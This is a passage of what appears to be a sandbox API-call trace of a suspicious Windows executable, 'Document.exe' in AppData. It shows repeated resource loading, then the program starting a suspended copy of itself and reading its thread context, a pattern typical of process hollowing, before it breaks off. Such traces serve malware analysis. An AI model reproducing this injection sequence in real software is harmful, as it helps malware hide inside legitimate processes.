hResInfo=0x47b4d8) returned 0x9b4 [0192.286] LoadResource (hModule=0x400000, hResInfo=0x47b4d8) returned 0x493d3c [0192.286] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.286] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.287] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.287] FindResourceW (hModule=0x400000, lpName=0x3f5, lpType=0x2) returned 0x47b4e8 [0192.287] SizeofResource (hModule=0x400000, hResInfo=0x47b4e8) returned 0x9b4 [0192.287] LoadResource (hModule=0x400000, hResInfo=0x47b4e8) returned 0x4946f0 [0192.287] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.287] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.287] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.287] FindResourceW (hModule=0x400000, lpName=0x3f6, lpType=0x2) returned 0x47b4f8 [0192.287] SizeofResource (hModule=0x400000, hResInfo=0x47b4f8) returned 0x9b4 [0192.287] LoadResource (hModule=0x400000, hResInfo=0x47b4f8) returned 0x4950a4 [0192.287] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.288] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.288] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.288] FindResourceW (hModule=0x400000, lpName=0x3f7, lpType=0x2) returned 0x47b508 [0192.288] SizeofResource (hModule=0x400000, hResInfo=0x47b508) returned 0x9b4 [0192.288] LoadResource (hModule=0x400000, hResInfo=0x47b508) returned 0x495a58 [0192.288] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.288] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.289] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.289] FindResourceW (hModule=0x400000, lpName=0x3f8, lpType=0x2) returned 0x47b518 [0192.289] SizeofResource (hModule=0x400000, hResInfo=0x47b518) returned 0x9b4 [0192.289] LoadResource (hModule=0x400000, hResInfo=0x47b518) returned 0x49640c [0192.289] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.289] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.289] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.289] FindResourceW (hModule=0x400000, lpName=0x3f9, lpType=0x2) returned 0x47b528 [0192.289] SizeofResource (hModule=0x400000, hResInfo=0x47b528) returned 0x9b4 [0192.289] LoadResource (hModule=0x400000, hResInfo=0x47b528) returned 0x496dc0 [0192.289] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.290] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.290] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.290] FindResourceW (hModule=0x400000, lpName=0x3fa, lpType=0x2) returned 0x47b538 [0192.290] SizeofResource (hModule=0x400000, hResInfo=0x47b538) returned 0x9b4 [0192.290] LoadResource (hModule=0x400000, hResInfo=0x47b538) returned 0x497774 [0192.290] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.291] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.291] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.291] FindResourceW (hModule=0x400000, lpName=0x3fb, lpType=0x2) returned 0x47b548 [0192.291] SizeofResource (hModule=0x400000, hResInfo=0x47b548) returned 0x9b4 [0192.291] LoadResource (hModule=0x400000, hResInfo=0x47b548) returned 0x498128 [0192.291] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.291] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.291] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.291] FindResourceW (hModule=0x400000, lpName=0x3fc, lpType=0x2) returned 0x47b558 [0192.291] SizeofResource (hModule=0x400000, hResInfo=0x47b558) returned 0x9b4 [0192.291] LoadResource (hModule=0x400000, hResInfo=0x47b558) returned 0x498adc [0192.292] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.292] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.292] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.292] FindResourceW (hModule=0x400000, lpName=0x3fd, lpType=0x2) returned 0x47b568 [0192.292] SizeofResource (hModule=0x400000, hResInfo=0x47b568) returned 0x9b4 [0192.292] LoadResource (hModule=0x400000, hResInfo=0x47b568) returned 0x499490 [0192.292] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.292] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.293] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.293] FindResourceW (hModule=0x400000, lpName=0x3fe, lpType=0x2) returned 0x47b578 [0192.293] SizeofResource (hModule=0x400000, hResInfo=0x47b578) returned 0x9b4 [0192.293] LoadResource (hModule=0x400000, hResInfo=0x47b578) returned 0x499e44 [0192.293] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.293] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.293] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.293] FindResourceW (hModule=0x400000, lpName=0x3ff, lpType=0x2) returned 0x47b588 [0192.294] SizeofResource (hModule=0x400000, hResInfo=0x47b588) returned 0x9b4 [0192.294] LoadResource (hModule=0x400000, hResInfo=0x47b588) returned 0x49a7f8 [0192.294] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.294] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.294] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.294] FindResourceW (hModule=0x400000, lpName=0x400, lpType=0x2) returned 0x47b598 [0192.294] SizeofResource (hModule=0x400000, hResInfo=0x47b598) returned 0x9b4 [0192.294] LoadResource (hModule=0x400000, hResInfo=0x47b598) returned 0x49b1ac [0192.294] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.295] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.295] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.295] FindResourceW (hModule=0x400000, lpName=0x401, lpType=0x2) returned 0x47b5a8 [0192.295] SizeofResource (hModule=0x400000, hResInfo=0x47b5a8) returned 0x9b4 [0192.295] LoadResource (hModule=0x400000, hResInfo=0x47b5a8) returned 0x49bb60 [0192.295] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.295] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.295] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.296] FindResourceW (hModule=0x400000, lpName=0x402, lpType=0x2) returned 0x47b5b8 [0192.296] SizeofResource (hModule=0x400000, hResInfo=0x47b5b8) returned 0x9b4 [0192.296] LoadResource (hModule=0x400000, hResInfo=0x47b5b8) returned 0x49c514 [0192.296] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.296] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.296] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.296] FindResourceW (hModule=0x400000, lpName=0x403, lpType=0x2) returned 0x47b5c8 [0192.296] SizeofResource (hModule=0x400000, hResInfo=0x47b5c8) returned 0x9b4 [0192.296] LoadResource (hModule=0x400000, hResInfo=0x47b5c8) returned 0x49cec8 [0192.296] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.297] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.297] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.297] FindResourceW (hModule=0x400000, lpName=0x404, lpType=0x2) returned 0x47b5d8 [0192.297] SizeofResource (hModule=0x400000, hResInfo=0x47b5d8) returned 0x9b4 [0192.297] LoadResource (hModule=0x400000, hResInfo=0x47b5d8) returned 0x49d87c [0192.297] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.297] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.298] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.298] FindResourceW (hModule=0x400000, lpName=0x405, lpType=0x2) returned 0x47b5e8 [0192.298] SizeofResource (hModule=0x400000, hResInfo=0x47b5e8) returned 0x9b4 [0192.298] LoadResource (hModule=0x400000, hResInfo=0x47b5e8) returned 0x49e230 [0192.298] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.298] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.298] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.298] FindResourceW (hModule=0x400000, lpName=0x406, lpType=0x2) returned 0x47b5f8 [0192.298] SizeofResource (hModule=0x400000, hResInfo=0x47b5f8) returned 0x9b4 [0192.298] LoadResource (hModule=0x400000, hResInfo=0x47b5f8) returned 0x49ebe4 [0192.298] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.299] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.299] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.299] FindResourceW (hModule=0x400000, lpName=0x407, lpType=0x2) returned 0x47b608 [0192.299] SizeofResource (hModule=0x400000, hResInfo=0x47b608) returned 0x9b4 [0192.299] LoadResource (hModule=0x400000, hResInfo=0x47b608) returned 0x49f598 [0192.299] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.299] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.300] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.300] FindResourceW (hModule=0x400000, lpName=0x408, lpType=0x2) returned 0x47b618 [0192.300] SizeofResource (hModule=0x400000, hResInfo=0x47b618) returned 0x9b4 [0192.300] LoadResource (hModule=0x400000, hResInfo=0x47b618) returned 0x49ff4c [0192.300] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.300] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.300] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.300] FindResourceW (hModule=0x400000, lpName=0x409, lpType=0x2) returned 0x47b628 [0192.300] SizeofResource (hModule=0x400000, hResInfo=0x47b628) returned 0x9b4 [0192.300] LoadResource (hModule=0x400000, hResInfo=0x47b628) returned 0x4a0900 [0192.300] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.301] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.301] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.301] FindResourceW (hModule=0x400000, lpName=0x40a, lpType=0x2) returned 0x47b638 [0192.301] SizeofResource (hModule=0x400000, hResInfo=0x47b638) returned 0x9b4 [0192.301] LoadResource (hModule=0x400000, hResInfo=0x47b638) returned 0x4a12b4 [0192.301] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.301] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.302] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.302] FindResourceW (hModule=0x400000, lpName=0x40b, lpType=0x2) returned 0x47b648 [0192.302] SizeofResource (hModule=0x400000, hResInfo=0x47b648) returned 0x9b4 [0192.302] LoadResource (hModule=0x400000, hResInfo=0x47b648) returned 0x4a1c68 [0192.302] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.303] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.303] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.303] FindResourceW (hModule=0x400000, lpName=0x40c, lpType=0x2) returned 0x47b658 [0192.303] SizeofResource (hModule=0x400000, hResInfo=0x47b658) returned 0x9b4 [0192.303] LoadResource (hModule=0x400000, hResInfo=0x47b658) returned 0x4a261c [0192.303] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.303] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.304] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.304] FindResourceW (hModule=0x400000, lpName=0x40d, lpType=0x2) returned 0x47b668 [0192.304] SizeofResource (hModule=0x400000, hResInfo=0x47b668) returned 0x9b4 [0192.304] LoadResource (hModule=0x400000, hResInfo=0x47b668) returned 0x4a2fd0 [0192.304] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.304] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.304] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.304] FindResourceW (hModule=0x400000, lpName=0x40e, lpType=0x2) returned 0x47b678 [0192.304] SizeofResource (hModule=0x400000, hResInfo=0x47b678) returned 0x9b4 [0192.304] LoadResource (hModule=0x400000, hResInfo=0x47b678) returned 0x4a3984 [0192.304] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.305] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.305] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.305] FindResourceW (hModule=0x400000, lpName=0x40f, lpType=0x2) returned 0x47b688 [0192.305] SizeofResource (hModule=0x400000, hResInfo=0x47b688) returned 0x9b4 [0192.305] LoadResource (hModule=0x400000, hResInfo=0x47b688) returned 0x4a4338 [0192.305] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.305] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.306] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.306] FindResourceW (hModule=0x400000, lpName=0x410, lpType=0x2) returned 0x47b698 [0192.306] SizeofResource (hModule=0x400000, hResInfo=0x47b698) returned 0x9b4 [0192.306] LoadResource (hModule=0x400000, hResInfo=0x47b698) returned 0x4a4cec [0192.306] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.306] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.306] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.306] FindResourceW (hModule=0x400000, lpName=0x411, lpType=0x2) returned 0x47b6a8 [0192.306] SizeofResource (hModule=0x400000, hResInfo=0x47b6a8) returned 0x9b4 [0192.306] LoadResource (hModule=0x400000, hResInfo=0x47b6a8) returned 0x4a56a0 [0192.306] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.307] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.307] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.307] FindResourceW (hModule=0x400000, lpName=0x412, lpType=0x2) returned 0x47b6b8 [0192.307] SizeofResource (hModule=0x400000, hResInfo=0x47b6b8) returned 0x9b4 [0192.307] LoadResource (hModule=0x400000, hResInfo=0x47b6b8) returned 0x4a6054 [0192.307] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.307] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.308] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.308] FindResourceW (hModule=0x400000, lpName=0x413, lpType=0x2) returned 0x47b6c8 [0192.308] SizeofResource (hModule=0x400000, hResInfo=0x47b6c8) returned 0x9b4 [0192.308] LoadResource (hModule=0x400000, hResInfo=0x47b6c8) returned 0x4a6a08 [0192.308] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.308] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.308] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.308] FindResourceW (hModule=0x400000, lpName=0x414, lpType=0x2) returned 0x47b6d8 [0192.309] SizeofResource (hModule=0x400000, hResInfo=0x47b6d8) returned 0x9b4 [0192.309] LoadResource (hModule=0x400000, hResInfo=0x47b6d8) returned 0x4a73bc [0192.309] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.309] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.309] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.309] FindResourceW (hModule=0x400000, lpName=0x415, lpType=0x2) returned 0x47b6e8 [0192.309] SizeofResource (hModule=0x400000, hResInfo=0x47b6e8) returned 0x9b4 [0192.309] LoadResource (hModule=0x400000, hResInfo=0x47b6e8) returned 0x4a7d70 [0192.309] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.310] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.310] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.310] FindResourceW (hModule=0x400000, lpName=0x416, lpType=0x2) returned 0x47b6f8 [0192.310] SizeofResource (hModule=0x400000, hResInfo=0x47b6f8) returned 0x9b4 [0192.310] LoadResource (hModule=0x400000, hResInfo=0x47b6f8) returned 0x4a8724 [0192.310] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.310] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.311] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.311] FindResourceW (hModule=0x400000, lpName=0x417, lpType=0x2) returned 0x47b708 [0192.311] SizeofResource (hModule=0x400000, hResInfo=0x47b708) returned 0x9b4 [0192.311] LoadResource (hModule=0x400000, hResInfo=0x47b708) returned 0x4a90d8 [0192.311] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.311] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.311] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.311] FindResourceW (hModule=0x400000, lpName=0x418, lpType=0x2) returned 0x47b718 [0192.311] SizeofResource (hModule=0x400000, hResInfo=0x47b718) returned 0x9b4 [0192.311] LoadResource (hModule=0x400000, hResInfo=0x47b718) returned 0x4a9a8c [0192.311] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.312] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.312] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.312] FindResourceW (hModule=0x400000, lpName=0x419, lpType=0x2) returned 0x47b728 [0192.312] SizeofResource (hModule=0x400000, hResInfo=0x47b728) returned 0x9b4 [0192.312] LoadResource (hModule=0x400000, hResInfo=0x47b728) returned 0x4aa440 [0192.312] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.313] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.313] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.313] FindResourceW (hModule=0x400000, lpName=0x41a, lpType=0x2) returned 0x47b738 [0192.313] SizeofResource (hModule=0x400000, hResInfo=0x47b738) returned 0x9b4 [0192.313] LoadResource (hModule=0x400000, hResInfo=0x47b738) returned 0x4aadf4 [0192.313] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.313] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.314] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.314] FindResourceW (hModule=0x400000, lpName=0x41b, lpType=0x2) returned 0x47b748 [0192.314] SizeofResource (hModule=0x400000, hResInfo=0x47b748) returned 0x9b4 [0192.314] LoadResource (hModule=0x400000, hResInfo=0x47b748) returned 0x4ab7a8 [0192.314] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.314] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.314] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.314] FindResourceW (hModule=0x400000, lpName=0x41c, lpType=0x2) returned 0x47b758 [0192.315] SizeofResource (hModule=0x400000, hResInfo=0x47b758) returned 0x9b4 [0192.315] LoadResource (hModule=0x400000, hResInfo=0x47b758) returned 0x4ac15c [0192.315] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.315] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.315] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.315] FindResourceW (hModule=0x400000, lpName=0x41d, lpType=0x2) returned 0x47b768 [0192.315] SizeofResource (hModule=0x400000, hResInfo=0x47b768) returned 0x9b4 [0192.315] LoadResource (hModule=0x400000, hResInfo=0x47b768) returned 0x4acb10 [0192.315] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.316] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.316] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.316] FindResourceW (hModule=0x400000, lpName=0x41e, lpType=0x2) returned 0x47b778 [0192.316] SizeofResource (hModule=0x400000, hResInfo=0x47b778) returned 0x9b4 [0192.316] LoadResource (hModule=0x400000, hResInfo=0x47b778) returned 0x4ad4c4 [0192.316] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.316] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.317] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.317] FindResourceW (hModule=0x400000, lpName=0x41f, lpType=0x2) returned 0x47b788 [0192.317] SizeofResource (hModule=0x400000, hResInfo=0x47b788) returned 0x9b4 [0192.317] LoadResource (hModule=0x400000, hResInfo=0x47b788) returned 0x4ade78 [0192.317] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.317] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.318] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.318] FindResourceW (hModule=0x400000, lpName=0x420, lpType=0x2) returned 0x47b798 [0192.318] SizeofResource (hModule=0x400000, hResInfo=0x47b798) returned 0x9b4 [0192.318] LoadResource (hModule=0x400000, hResInfo=0x47b798) returned 0x4ae82c [0192.318] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.318] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.318] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.318] FindResourceW (hModule=0x400000, lpName=0x421, lpType=0x2) returned 0x47b7a8 [0192.318] SizeofResource (hModule=0x400000, hResInfo=0x47b7a8) returned 0x9b4 [0192.318] LoadResource (hModule=0x400000, hResInfo=0x47b7a8) returned 0x4af1e0 [0192.318] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.319] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2b000, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.322] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0192.322] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f8c0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f91c | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"", lpProcessInformation=0x18f91c*(hProcess=0xec, hThread=0xf4, dwProcessId=0xa38, dwThreadId=0x94c)) returned 1 [0192.329] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x520000 [0192.329] GetThreadContext (in: hThread=0xf4, lpContext=0x520000 | out: lpContext=0x520000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x45e064, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, 